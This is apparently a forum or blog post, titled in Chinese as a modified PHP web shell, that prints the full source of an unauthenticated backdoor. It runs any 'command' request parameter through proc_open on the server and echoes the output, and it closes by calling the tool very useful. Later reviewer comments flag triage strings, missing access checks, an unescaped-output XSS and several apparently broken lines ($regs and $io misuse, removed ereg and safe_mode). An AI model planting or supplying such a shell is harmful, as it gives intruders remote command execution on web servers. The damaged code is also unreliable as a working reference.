改一个PHP WEB SHELL
<?phpdefine("WINDOWS",1) ;
// WINDOWS is read in Webshell::_exec() to decide whether command output is
// passed through GBK2UTF8() before it is stored in the session.
// NOTE(review): the opening tag and define() are fused on the line above as
// printed; presumably a line break was lost when the page was extracted.
/**
 * Re-encode a GBK byte string as UTF-8.
 *
 * The input is handed back untouched when it is empty (by PHP's empty()
 * rules, so null, '' and '0' all qualify) or when the iconv extension is
 * not loaded. Otherwise the result of iconv() is returned as-is.
 *
 * @param string|null $text Text assumed to be GBK-encoded.
 * @return mixed The converted string, or the original value when no
 *               conversion was attempted.
 */
function GBK2UTF8($text=null){
    // Guard clause: nothing to convert, or no converter available.
    if (empty($text) || !function_exists('iconv')) {
        return $text;
    }

    return iconv('GBK', 'UTF-8', $text);
}
/**
 * Collapse runs of blank lines in a block of text.
 *
 * The text is trimmed first; leading line breaks and any sequence of line
 * breaks separated only by whitespace are then replaced by a single "\n".
 * A falsy argument (null, '', '0', ...) yields the empty string.
 *
 * @param string|null $str Text to tidy.
 * @return string|null Result of preg_replace(), or '' for falsy input.
 */
function remove_blanklines($str){
    if (!$str) {
        return '';
    }

    $trimmed = trim($str);

    return preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $trimmed);
}
/*
 * Webshell: takes a command string from the HTTP request and runs it on the
 * server through proc_open(), keeping the working directory, command history
 * and accumulated output in $_SESSION.
 *
 * Review notes for defenders and responders:
 * - No authentication, authorisation or origin check is visible anywhere in
 *   this listing; any client that can reach the file reaches run().
 * - Strings present here that can be searched for when triaging a web root:
 *   $_REQUEST['command'] flowing into proc_open(), and the session keys
 *   'cwd', 'history' and 'output'.
 * - No session_start() call is visible in this listing.
 * - NOTE(review): the listing looks damaged by extraction (see the notes on
 *   $regs and $io below) and relies on ereg() and the safe_mode setting,
 *   both of which no longer exist in current PHP releases.
 */
class Webshell {
// Settings array, filled in by __init__(); only 'home-directory' is used.
private $default_settings = null ;
/*
 * Set the defaults and reset the per-session state.
 * Not a PHP constructor (that would be __construct); it is called
 * explicitly from run() when the session has no working directory yet.
 */
function __init__(){
$this->default_settings = array('home-directory' => '.');
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
/*
 * Request entry point: initialise the session state if needed, then hand a
 * non-empty 'command' request parameter to _exec().
 */
function run(){
if (empty($_SESSION['cwd'])) {
$this->__init__();
}
// Untrusted input: read from GET, POST or cookies (depending on the
// request_order setting) and only trimmed before it is executed.
$command = $_REQUEST['command'] ;
if (!empty($command)){
$command = trim($command);
$this->_exec($command);
}
}
/*
 * Record $command in the session history, handle 'cd' internally, run any
 * other command through proc_open() in the session's working directory, and
 * echo the accumulated session output inside <PRE>.
 */
function _exec($command){
if (!empty($command)) {
// Move a repeated command to the front of the history instead of
// storing it twice.
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $command);
// The command text is appended to the output buffer without HTML
// escaping, so markup in the request parameter reaches the echo below.
$_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ;
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
}
elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
// NOTE(review): $regs is the match array filled by ereg(), yet it is
// used below as if it were the captured path string; subscripts appear
// to have been lost from this listing.
if ($regs{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs;
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs;
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
// The normalised path is not confined to the home directory.
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
// This message is also stored without HTML escaping.
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
}
else {
// We cannot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advise programs (ls for example) of the terminal size.
putenv('ROWS=' . 80);
putenv('COLUMNS=' . 600);
}
$shell_result = '' ;
$io = array();
// The request-supplied string is passed to proc_open() as the command,
// with stdout (1) and stderr (2) captured through pipes and the
// session's working directory as cwd.
$p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']);
// NOTE(review): $io is the pipes array populated by proc_open(), but the
// calls below treat it as a single stream, and the two read loops and
// the two fclose() calls are identical as printed.
/* Read output sent to stdout. */
while (!feof($io)) {
$shell_result .= htmlspecialchars(fgets($io));
}
/* Read output sent to stderr. */
while (!feof($io)) {
$shell_result .= htmlspecialchars(fgets($io));
}
fclose($io);
fclose($io);
proc_close($p);
// Command output, unlike the command text above, is HTML-escaped before
// it is re-encoded and stored.
$shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result;
$shell_result = remove_blanklines($shell_result);
$_SESSION['output'] .= $shell_result;
}
}
/* Build the command history for use in the JavaScript */
// $js_command_hist is assigned here but not used again in this listing.
// addslashes() is not an escaper for JavaScript or HTML contexts.
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
// The whole session buffer is written to the response on every executed
// command.
echo "<PRE>{$_SESSION['output']}</PRE>" ;
}
}
// Script entry point: every request to this file builds a Webshell and calls
// run(), which executes the 'command' request parameter. No access check is
// visible before this point in the listing.
$inst = new Webshell();
$inst->run();
很好用